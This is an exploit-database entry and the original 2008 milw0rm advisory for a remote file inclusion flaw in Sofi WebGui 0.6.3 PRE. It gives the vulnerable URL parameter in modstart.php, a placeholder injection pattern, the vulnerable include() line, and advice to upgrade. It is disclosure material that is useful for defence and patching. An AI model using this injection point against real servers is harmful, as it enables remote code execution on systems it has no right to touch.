header-logo
Suggest Exploit
vendor:
Sofi WebGui
by:
dun
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Sofi WebGui
Affected Version From: 0.6.3 PRE
Affected Version To: 0.6.3 PRE
Patch Exists: YES
Related CWE: N/A
CPE: a:muskatli_net:sofi_webgui
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Sofi WebGui <= 0.6.3 PRE Remote File Inclusion Vulnerability

Sofi WebGui version 0.6.3 PRE and prior are vulnerable to a Remote File Inclusion vulnerability. The vulnerability is due to the 'mod_dir' parameter in the 'modstart.php' script not being properly sanitized before being used in an 'include' function call. This can be exploited to include arbitrary files from remote hosts.

Mitigation:

Upgrade to the latest version of Sofi WebGui.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################################
 #  [ Sofi WebGui <= 0.6.3 PRE ]   Remote File Inclusion Vulnerability   #
 #########################################################################
 #
 # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
 # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
 #
 # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
 #      
 #
 # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
 #
 # ...
 # 	if($ff=="") $ff = "index";
 #	$file_name = "m_$ff.php";
 #
 #	//start web module
 #	include("$mod_dir/$file_name");		// RFI
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-23]